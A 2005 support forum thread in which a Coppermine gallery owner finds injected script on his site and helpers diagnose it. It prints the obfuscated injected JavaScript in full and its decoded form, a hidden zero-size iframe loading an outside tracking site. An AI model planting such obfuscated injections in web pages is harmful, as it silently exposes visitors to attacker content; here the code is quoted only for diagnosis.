Coppermine connects to some other strange url... Coppermine connects to some other strange url...
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Coppermine connects to some other strange url...

Started by maolu, August 23, 2005, 11:19:26 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

maolu

August 23, 2005, 11:19:26 AM
I noticed it yesterday.

When i open coppermine's index page, it connects to some other url, something like http://www.carambadeus.com/.
Today i also noticed that browsing my gallery with firefox, it asks me for Java Runtine Environment in order to "properly view the page"...

Is this normal?!?!

Joachim Müller

#1
August 23, 2005, 11:20:01 AM
post a link to your site, how else could we tell?

maolu

#2
August 23, 2005, 11:33:06 AM
oks

www.maolu.it/gallery

maolu

#3
August 23, 2005, 06:13:57 PM
!!!

i found that on top of my page there is THIS:

Code Select
<script language=javascript>
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286Fliudph%2853vuf%286Gkwws%286D22wudi1vq0qhw1lqir2lqgh%7B1sks%2853iudpherughu%286G3%2853zlgwk%286G3%2853khljkw%286G3%2853vfuroolqj%286Gqr%2853qdph%286Gfrxqwhu%286H%286F2liudph%286H3')
</script>

This is javascript code i can't find in any of the files of coppermine, i cannot understand where is it coming from and i'm sure now that this is the reason of the strange request for Java Runtime Environment!!!

Tranz

#4
August 23, 2005, 11:24:01 PM
Worked fine for me. Maybe it's something to do with your computer.

Nibbler

#5
August 23, 2005, 11:26:57 PM
You need to kill that js, it's opening an iframe to somewhere.

maolu

#6
August 23, 2005, 11:30:03 PM
Quote from: Nibbler on August 23, 2005, 11:26:57 PM
You need to kill that js, it's opening an iframe to somewhere.

I know but it's NOT related to my files!
I never put any js into any page...
I suppose it's something with my internet provider, i just wrote them, i hope they'll answer as soon as possible!!!

kegobeer

#7
August 24, 2005, 03:42:00 AM
Well, whoever put that crap on your site got it from here:

http://scriptasylum.com/tutorials/encdec/encode-decode.html

The code is copied verbatim from that website.  Here's what is actually put on your page:

Code Select
<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>

Code Select
dF('%286Fliudph%2853vuf%286Gkwws%286D22wudi1vq0qhw1lqir2lqgh%7B1sks%2853iudpherughu%286G3%2853zlgwk%286G3%2853khljkw%286G3%2853vfuroolqj%286Gqr%2853qdph%286Gfrxqwhu%286H%286F2liudph%286H3')

So, the function dF(s) unescapes whatever string is in dF('...').  This is contained in dF:

Code Select
<iframe src=http://traf.sn-net.info/index.php frameborder=0 width=0 height=0 scrolling=no name=counter></iframe>

More of the same crap is on that website, pretty much causing a repeating loop to the same websites over and over.  Definitely up to no good.
Do not send me a private message unless I ask for one.  Make your post public so everyone can benefit.

There are no stupid questions
But there are a LOT of inquisitive idiots

maolu

#8
August 24, 2005, 09:21:28 AM
I received a mail from my provider...

They say that probably there has been some sort of hackering over my site and the way to solve it is to change the CHMOD of the coppermine's dir in order to prevent web users to enter. :o :o >:(

I think they're crazy because thousand of people use html uploads without this kind of problems!!!
I'm waiting for an answer from them....

kegobeer

#9
August 25, 2005, 02:03:02 AM
If you allow other than images, you can cause yourself a bit of grief.  You might want to approve all images before they are viewable - this way you can verify what's been uploaded and delete any odd files.
Do not send me a private message unless I ask for one.  Make your post public so everyone can benefit.

There are no stupid questions
But there are a LOT of inquisitive idiots

Joachim Müller

#10
August 26, 2005, 09:03:39 AM
what filetypes do you allow to be uploaded? Never ever allow htm, html, js, asp, php, php3. In fact you should allow pics and that's it. Yes, your site has been hacked. You'll have to find out where the attacker entered: was it a gap you have opened up deliberately, or did they come in through some kind of backdoor (vulnerability).

maolu

#11
August 26, 2005, 09:28:53 AM
I asked my internet provider for this and they say there has been an intusion on their server.

By now they still don't know how it happenend.... >:( :(
Print
Go Up Pages1
User actions